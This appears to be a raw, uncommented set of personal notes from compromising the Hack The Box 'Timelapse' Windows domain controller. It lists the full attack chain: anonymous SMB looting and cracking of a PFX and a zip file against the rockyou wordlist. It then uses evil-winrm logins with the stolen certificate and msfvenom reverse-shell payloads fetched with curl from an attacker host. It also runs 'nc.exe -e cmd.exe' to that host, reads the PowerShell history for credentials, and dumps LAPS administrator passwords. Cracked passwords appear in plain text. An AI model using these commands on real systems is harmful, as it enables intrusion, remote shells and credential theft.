smbclient '\\10.10.11.152\Shares' -N -c 'prompt OFF;recurse ON;cd '*';lcd '/home/anhndt/htb/timelapse.htb/';mget *'`
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
aaaa

cat rockyou.txt| 
while read p; do 
    echo trying $p; 
    openssl pkcs12 -in "legacyy_dev_auth.pfx"  -passin "pass:$p"; 
    RC=$?; if [ $RC -eq 0 ]; then 
break; fi ; done


pfx2john yourP12File.pfx | john  --wordlist=/home/anhndt/Stuffs/rockyou.txt /dev/stdin

pfx2john yourP12File.pfx > hashfile
john  --wordlist=/home/anhndt/Stuffs/rockyou.txt hashfile

thuglegacy

smbmap -u "Legacyy" -A  -P 445 -H 10.10.11.152

evil-winrm -i 10.10.11.152 -c pub.pem -k priv.pem -S -r timelapse.htb
evil-winrm -i 10.10.11.152 -c legacyy_dev_auth.crt -k legacyy_dev_auth.key -S -r timelapse.htb
aaaa

curl.exe --output winPEASany_ofs.exe --url http://10.10.16.28:8000
curl.exe --output winPEAS.bat --url http://10.10.16.28:8000

wmic os get osarchitecture
[Environment]::Is64BitOperatingSystem -> PowerShell

nc.exe -e cmd.exe 10.10.16.28 9999

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.28 lport=9999 -f msi > shell.msi
curl.exe --output shell.msi --url http://10.10.16.28:8000
msiexec /quiet /i http:\\10.10.16.28:8000\shell.msi
msiexec /quiet /qn /i shell.msi


msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.28 LPORT=9999 -f exe > NsReverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.28 LPORT=9999 -f exe > reverse.exe

curl.exe --output reverse.exe --url http://10.10.16.28:8000/reverse.exe

curl.exe --output shell.msi --url http://10.10.16.28:8000/shell.msi

curl.exe --output winPEAS.bat --url http://10.10.16.13:8000/winPEAS.bat


curl.exe --output winPEASany_ofs.exe --url http://10.10.16.28:8000/winPEASany_ofs.exe

curl.exe --output Simple_Rev_Shell.cs --url http://10.10.16.28:8000/Simple_Rev_Shell.cs

c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\legacyy\Documents\Simple_Rev_Shell.cs


type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /all}
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {get-adcomputer}



svc_deploy | E3R$Q62^12p7PLlC%KWaxuaV

thuglegacy


nltest.exe /server:10.10.11.152 /dsgetdc: /writable /force

evil-winrm -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -i 10.10.11.152  -S

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

Get-ADComputer -Filter * -Properties *

evil-winrm -u 'Administrator' -p 'bAKrN%$l3u1957+.b63Is@h;' -i 10.10.11.152  -S


DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : bAKrN%$l3u1957+.b63Is@h;
ms-Mcs-AdmPwdExpirationTime : 133054517269504553
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :

DistinguishedName : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName       :
Enabled           : True
Name              : DB01
ObjectClass       : computer
ObjectGUID        : d38b3265-230f-47ae-bdcd-f7153da7659d
SamAccountName    : DB01$
SID               : S-1-5-21-671920749-559770252-3318990721-1606
UserPrincipalName :

DistinguishedName : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb
DNSHostName       :
Enabled           : True
Name              : WEB01
ObjectClass       : computer
ObjectGUID        : 897c7cfe-ba15-4181-8f2c-a74f88952683
SamAccountName    : WEB01$
SID               : S-1-5-21-671920749-559770252-3318990721-1607
UserPrincipalName :

DistinguishedName : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb
DNSHostName       :
Enabled           : True
Name              : DEV01
ObjectClass       : computer
ObjectGUID        : 02dc961a-7a60-4ec0-a151-0472768814ca
SamAccountName    : DEV01$
SID               : S-1-5-21-671920749-559770252-3318990721-1608
UserPrincipalName :

Get-ChildItem *.txt -Recurse -Path C:\

cat C:\Users\TRX\Desktop\root.txt


------------------------------------------------------------------------------------------------------

smbmap -u "guest" -p "" -P 445 -H 10.10.11.152

smbmap -u "Legacyy " -p "" -P 445 -H 10.10.11.152

smbclient //10.10.11.152/Shares –U guest

smbclient //10.10.11.152/Shares –U Legacyy -A


fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

supremelegacy